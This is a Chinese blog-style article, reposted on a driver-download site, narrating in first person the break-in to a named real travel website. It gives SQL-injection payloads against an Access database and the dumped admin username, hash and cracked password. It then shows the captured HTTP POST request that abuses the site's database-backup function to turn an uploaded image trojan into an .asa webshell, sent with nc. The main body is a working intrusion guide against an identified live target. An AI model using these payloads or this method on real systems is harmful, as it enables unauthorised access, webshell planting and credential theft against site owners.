驱动管家:安全、高效、精准的专业驱动下载站!

如何进入数据库抓包备份数据?入侵网站备份数据的方法

2018-02-13 15:04:06责编:llp   来源:驱动管家     人气:

这是我之前在绿色兵团时写的一篇文章,是我自己原创的,思路借鉴了一篇t00ls里的,进行了改进。我在绿色兵团的账号名字也是leisureforest真实性毋庸置疑,希望给过。thanks

地址(仅用于替代目标网站,非本站)

又是旅游网。我刚才发了一篇文章,正想走,外面下雨了。实在是闲的难受。再写这个,提提我人气。

这个地址是一个家伙发给我的,他说让我试一试,我随便找了个链接http://www.kmholiday.com/Travel/Travel_line_view.asp?lineid=1030’加了个特殊字符,马上返回错误信息

Microsoft JET Database Engine

错误'80040e14'语法错误(操作符丢失) 在查询表达式'id=1030‘' 中。

/Travel/Travel_line_view.asp,行 41

什么意思嘛。这不明摆着让我搞他。access的数据库,直接上语句,and exists(select * from msysobjects)

Microsoft JET Database Engine

错误'80040e09'

不能读取记录;在'msysobjects' 上没有读取数据权限。

/Travel/Travel_line_view.asp,行41

有这个表但是不能访问。好的 接着执行and exists(select * from admin) 正常页面 ;有admin表---- 帅

and exists(select count(user) from admin)还是正常页面有user字段

and exists(select count(psw from admin) 正常页面,密码字段。

用户名aidy 密码28B9E7A5FADBDB964E9069BC82AC2AF9 32位加密的,吓死我了。去MD5搞了下,汗19850311 奶奶的,真唬人。这时我就给那人发信息了,这个也太简单了吧,还高什么,他说,拿到shell才算。好吧接着搞。

找后台,这个可真难住我了。先上工具,扫了四万多条愣是没找到。其实这种情况他肯定有个目录很难差,根本不好搞,怎么办,还是google ,用了好几个语句,只找到俩登陆页面但是都不对。还是回到首页看图片,但是右键不能使用,不让查看属性。最后下载的时候从迅雷里看的地址。我真有办法哈哈……

找到这个页面了http://www.kmholiday.com/adminsheeninfo/直接跳转登陆。

进去之后发现有数据库备份。先找了个上传,上传了个图片木马正当我兴致勃勃地来备份的时候,出问题了,原来备份路径不能修改。也就是说你备份只能备份mdb数据库文件,备份之后的文件名为asa,这个倒是没问题,iis可以解析,关键是路径不让动,这可难死我了,怎么办呢。还是右键查看源码吧。找到了这个链接

adminsheeninfo/Oledit/ewebeditor/汗,又是编辑器,编辑器啊编辑器,又是你,都不想搞了,进入编辑器,登陆页面也没有删除。现在我写文章的时候被删了,我知道是谁删的(不是我),不截图了。进去还是那个用户名密码。找到样式管理,原来的样式保存按钮被删除了,他以为这样就安全了。那么我copy了一个样式,在新创建的样式里,添加了asp格式。asa.但是都没有成功,其实如果在这里添加aaspsp就可以了,但是我没想到他有这么蠢的漏洞,我就没这么搞。难道我会拿不到shell。不可能。

于是我苦思冥想,终于想到了一句话木马。后来一看人家两年前就有人想到这个方法了,就是在添加新闻那里插入一个新闻抓下包,然后改新闻内容为自己的一句话nc提交、如下图

抓包内容如下

POST /adminsheeninfo/Oledit/Upload.asp?action=remote&type=remote&style=s_light HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, **Referer: http://www.kmholiday.com/adminsh ... p?action=BackupDataAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kmholiday.comContent-Length: 162Connection: Keep-AliveCache-Control: no-cacheCookie: cck_lasttime=1312255680031; cck_count=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP

DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb&bkfolder=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname=DB_BAK_20110802_1201247.asa&bknotes=

大家看到最后这个链接没有,这个事什么意思呢,分析下先。DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb这个是原来的数据库名称,%23是空格,%2f是/的编码,转换之后就是/adminsheeninfo/db/web_date_#_sheenzhaoghsy&#@!.mdb备份后的数据库名称就是=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname我们要修改原来的数据库名称为自己上传的图片马,随便一个吧,比如2011-8-2 12:07:04.jpg,我随便写的,吧原数据库路径改成这个,然后数出来原来的数据库路径的字符长度,比如是162(假设)我不数了,我记得当时数的是153,图片是64,然后用153-64=89那么就把原来的Content-Length: 162修改为89,然后用保存为qq.txt,文件名随便起。保存为txt文档。

如何进入数据库抓包备份数据?入侵网站备份数据的方法

复制到c盘根目录下面用nc上传(nc也要放到c盘根目录)

命令nc www.kmholiday.com 80

%2Fadminsheeninfo%2FOledit%2FUploadFile%2F2011730232015138.jpg 62已经成功备份,你的数据库的路径:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa返回...database/DataBackup/\DB_BAK_20110730_231235.asa

这个就是备份之后的Asp马地址D:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa用侠客客服端连接一下就可以了,然后上传自己的asp MM,访问,我没再截图,这样不好你懂的。

好啦,看来看似简单的东西并不是那么容易得到,切莫眼高收低,像我一样,踏踏实实做事还是好些。

  • sql server怎么加密?如何防范sql注入攻击?

    sql server怎么加密?如何防范sql注入攻击?

    SQL Server上内置了加密术用来保护各种类型的敏感数据。在很多时候,这个加密术对于你来说是完全透明的;当数据被存储时候被加密,它们被使用的时候就会自动加密。在其他的情况下,你可以选择数据是否要被加密。S

    详情2018-01-16 08:54:03责编:llp   来源:驱动管家     
  • 保证数据安全需要做哪些事?哪些文件需要加密?怎么加密?

    保证数据安全需要做哪些事?哪些文件需要加密?怎么加密?

    【编者按:生活中我们总会面对各种各样的数据,对于那些需要保密的数据我们会选择各类的加密方法。那么对于使用办公软件制作的文稿、表格、演示文稿和数据库我们如何加密呢?】在日常工作中,我们经常用一些办公

    详情2018-01-25 10:19:10责编:llp   来源:驱动管家     
  • 系统漏洞需要修复吗?加加米网站漏洞修复的方法是什么?

    系统漏洞需要修复吗?加加米网站漏洞修复的方法是什么?

    通过该漏洞,可以刷加加米的积分详细说明:通过Fiddler软件 可以截取包 达到修改js目的让这里的20不用再等待 直接提交ajax 来做时间欺骗之前js文件click js复制代码代码如下:function init(s_time, d_delay,

    详情2018-02-03 11:19:34责编:llp   来源:驱动管家     
  • 如何利用网络访问控制抵御内部和外部攻击?

    如何利用网络访问控制抵御内部和外部攻击?

    根据美国特勤局在最近公布的Verizon数据泄漏调查报告中提供的数据显示,内部人员攻击事故的数量在过去一年又翻了一番,但是外部攻击仍然是主要攻击来源,这说明企业仍然没有保护好网络和数据的安全。主动安全控制

    详情2018-02-09 17:58:29责编:llp   来源:驱动管家     
  • voip渗透现状 怎么保护voip基础设施?

    voip渗透现状 怎么保护voip基础设施?

    黑客通过VoIP渗透来窃取、私用企业的VoIP电话,造成了VoIP的不安全性。开放性的架构所带来的灵活性让VoIP能够渗透到企业的整个管理流程中去,提高通信效能,提高生产效率,这是IP技术的核心优势所在。所有影响数据网

    详情2018-02-09 18:51:31责编:llp   来源:驱动管家     
  • filezilla server如何提权?filezilla server提权步骤

    filezilla server如何提权?filezilla server提权步骤

    首先明确一下以下三个要素:一、FileZilla Server安装路径,为得到FileZilla Server Interface xml文件提供条件。二、本地FileZilla Server要与服务器版本兼容,不然会提示版本不同,协议错误。三、FileZilla

    详情2018-01-25 15:11:50责编:llp   来源:驱动管家     
  • cmos设置的参数被debug毁了怎么办?可以采取编程实现

    cmos设置的参数被debug毁了怎么办?可以采取编程实现

    如果你只想 "15秒绿色环保型 "请直接看方法3:*如果你想对cmos有个深入的了解或揪出本文理解的不足,请看方法0,1,2,3-:)----CMOS (Award)密码简介与破解0--3法----计算机启动时,由存放在主板ROM中的bios将cmos

    详情2018-01-28 20:24:45责编:llp   来源:驱动管家     
  • 内网安全管理 应对企业内网安全挑战的10种策略

    内网安全管理 应对企业内网安全挑战的10种策略

    几乎所有企业对于网络安全的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素。然而,Intranet内部的攻击和入侵却依然猖狂。事实证明,公司内部的不安全因素远比外部的危害更恐怖。

    详情2018-01-19 17:54:32责编:llp   来源:驱动管家     
  • 进程是什么?linux 查看进程怎么发现木马?

    进程是什么?linux 查看进程怎么发现木马?

    对于进程这个概念,许多电脑用户都没有给予太多关注。在很多人印象里,只知道结束进程可以杀死程序,至于哪些进程对应哪些程序,究竟什么样的进程该杀,什么样的进程不能杀这些问题很少考虑。这里通过几个实例为

    详情2018-01-17 15:24:29责编:llp   来源:驱动管家     
  • 服务器有哪三大攻击杀手?什么是cc攻击?

    服务器有哪三大攻击杀手?什么是cc攻击?

    服务器方法有很多 如网站在同一时间受到大量的访问流量 超过网站服务器所能承受的限制 那么网站所解析的服务器就会崩溃。主流的服务器攻击方式有多种手段,但是唯独DDoS攻击、CC攻击以及ARP欺骗,这些攻击方式

    详情2018-01-13 14:51:31责编:llp   来源:驱动管家